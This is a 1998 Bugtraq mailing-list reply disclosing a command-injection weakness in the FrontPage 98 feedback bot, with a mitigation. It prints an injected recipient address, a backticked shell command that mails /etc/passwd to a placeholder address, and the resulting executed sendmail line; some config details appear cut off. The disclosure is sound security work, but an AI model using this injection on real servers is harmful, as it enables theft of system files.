mailing list archives
Re: Followup to FP98 and other Frontpage bugs
From: maex-lists-bugtraq () SPACE NET (Markus Stumpf)
Date: Wed, 14 Oct 1998 02:21:34 +0200
On Mon, Oct 12, 1998 at 11:22:38AM -0700, pedward () WEBCOM COM wrote:
So, here is the status of Frontpage and it's (in)security.
Don't know whether this has already been reported.
I've noticed another weakness which is still present at least in
FP98 with the version id:
When installing a server for Frontpage it creates a file (usually)
In order to get the feedback bot working for sending feedback via eMail
you can define within this file
The "%r" above is substituted with the recipients email address(es).
With this setting you are vulnerable, as creating a feedback page
with a recipient address of e.g.
`/usr/bin/Mail -s 'password' nobody () example com < /etc/passwd`
will execute the command
/usr/sbin/sendmail `/usr/bin/Mail -s 'password' nobody () example com < /etc/passwd`
and send the password file to nobody () example com
To avoid this tell Frontpage to use the SMTP protocol to send emails
and you may probably also use
MailSender:webmaster () example com
SpaceNet GmbH | http://www.Space.Net/ | In a world whithout
Research & Development | mailto:research () Space Net | walls and fences,
Frankfurter Ring 193a | Tel: +49 (89) 32356-0 | who needs
D-80807 Muenchen | Fax: +49 (89) 32356-299 | Windows and Gates?
DU 4.0D cdfs bug : xcd eject CDROM, even mounted. Alexis POLOZOV (Oct 09)